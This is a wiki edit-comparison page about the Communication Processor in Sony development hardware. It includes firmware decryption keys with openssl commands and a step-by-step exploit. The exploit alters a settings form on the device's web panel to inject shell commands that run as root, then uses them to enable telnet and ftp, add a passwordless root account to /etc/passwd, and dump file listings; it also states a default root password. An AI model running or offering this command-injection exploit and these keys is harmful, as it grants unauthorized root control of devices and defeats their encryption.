Editing Communication Processor
Jump to navigation
Jump to search
The edit can be undone. Please check the comparison below to verify that this is what you want to do, and then publish the changes below to finish undoing the edit.
Latest revision | Your text | ||
Line 4: | Line 4: | ||
[[CXD9790GG]] (I/O) | [[CXD9790GG]] (I/O) | ||
[[TCP-510]] (Board ID on the DEH models such as [[DEH- | [[TCP-510]] (Board ID on the DEH models such as [[DEH-R1040]]) | ||
[[TCP-520]] (Board ID on the [[DECR-1000]]) | [[TCP-520]] (Board ID on the [[DECR-1000]]) | ||
Line 23: | Line 23: | ||
The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them : | The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them : | ||
* The first 16 bytes of the package is the IV, the Second 16 bytes is the | * The first 16 bytes of the package is the IV, the Second 16 bytes is the hash of the decrypted package. | ||
So use this Syntax after skipping the first 32 bytes of the file: | So use this Syntax after skipping the first 32 bytes of the file: | ||
{{keyboard|content= | {{keyboard|content=openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d > dec.tgz | ||
}} | |||
PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary. | PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary. | ||
Line 34: | Line 34: | ||
The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000 | The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000 | ||
{{keyboard|content= | {{keyboard|content=openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d > dec.tgz | ||
}} | |||
P.S. If you have any trouble extracting the tarballs, try using Linux. | P.S. If you have any trouble extracting the tarballs, try using Linux. | ||
Line 49: | Line 49: | ||
*source code [http://gitorious.ps3dev.net/cp-update-crypt cp-update-crypt] [[Gitorious]] | *source code [http://gitorious.ps3dev.net/cp-update-crypt cp-update-crypt] [[Gitorious]] | ||
== | == Exploting the Communication Processor == | ||
After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the [[CXD9790GG]] MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit: | After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the [[CXD9790GG]] MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit: | ||
=== Step 1 - The Development Tool Web panel === | === Step 1 - The Development Tool Web panel === | ||
Line 76: | Line 61: | ||
Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get: | Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get: | ||
< | <pre> | ||
<html> | <html> | ||
<head> | <head> | ||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> | <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> | ||
<title>Save | <title>Save & load</title> | ||
<link rel="stylesheet" href="/style.css"> | <link rel="stylesheet" href="/style.css"> | ||
</head> | </head> | ||
<body> | <body> | ||
<div class="title">Save | <div class="title">Save & load</div> | ||
<div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr> | <div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr> | ||
<div class="contents"> | <div class="contents"> | ||
Line 133: | Line 118: | ||
</body> | </body> | ||
</html> | </html> | ||
</ | </pre> | ||
Line 142: | Line 127: | ||
Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those | Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those | ||
What you really want | What you really want is this part : | ||
{{keyboard|content= | |||
Setting file | |||
</th> | |||
<td> | |||
<input type="file" name="setting"> | |||
</td> | |||
}} | |||
Into this part: | Into this part: | ||
< | |||
<input type="text" name="setting"> | {{keyboard|content= | ||
</ | Setting file | ||
</th> | |||
<td> | |||
<input type="text" name="setting"> | |||
</td> | |||
</tr> | |||
}} | |||
As you can see, the change is subtle, but it allows you input actual text instead of sending a file | As you can see, the change is subtle, but it allows you input actual text instead of sending a file | ||
Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks | Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks) | ||
So, change all the hyperlinks to their full path, for | So, change all the hyperlinks to their full path, for exemple <form action="save_setting.cgi?lang=english" method="post" becomes <form action="http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english" method="post" | ||
To the lazy ones, this is what the result should look like (change the hyperlinks accordingly) | To the lazy ones, this is what the result should look like (change the hyperlinks accordingly) | ||
< | <pre> | ||
<html> | <html> | ||
<head> | <head> | ||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> | <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> | ||
<title>Save | <title>Save & load</title> | ||
<link rel="stylesheet" href="/style.css"> | <link rel="stylesheet" href="/style.css"> | ||
</head> | </head> | ||
<body> | <body> | ||
<div class="title">Save | <div class="title">Save & load</div> | ||
<div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr> | <div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr> | ||
<div class="contents"> | <div class="contents"> | ||
Line 216: | Line 213: | ||
</body> | </body> | ||
</html> | </html> | ||
< | </pre> | ||
=== Step 3 - Profit ! === | === Step 3 - Profit ! === | ||
Line 280: | Line 220: | ||
You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the "Setting" button) preceded by "; " (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit: | You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the "Setting" button) preceded by "; " (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit: | ||
Add a line to start telnet in inetd.conf ( | Add a line to start telnet in inetd.conf (the line already exists in the original file but is commented) | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/inetd.conf telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd }} | ||
Add a line to start ftpd in inetd.conf | Add a line to start ftpd in inetd.conf | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd }} | ||
Restart inetd to apply the above changes | Restart inetd to apply the above changes | ||
{{keyboard|content= | {{keyboard|content=; /etc/init.d/inetd restart }} | ||
Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology | Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/passwd rt::0:0:root:/root:/bin/bash }} | ||
You may also output files given the right path (if you don't want to mess with ftp) the below | You may also output files given the right path (if you don't want to mess with ftp) the below exemple creates a ls.txt file containing a listing of all files on the CP at the Development panel's root | ||
{{keyboard|content= | {{keyboard|content=; ls -alR /* > /usr/local/sony/www/html/ls.txt }} | ||
While sending all these commands (by clicking on the "Setting" button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal. | While sending all these commands (by clicking on the "Setting" button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal. | ||
Line 296: | Line 236: | ||
Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates. | Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates. | ||
{{Motherboard Components}}<noinclude>[[Category:Main]]</noinclude> | |||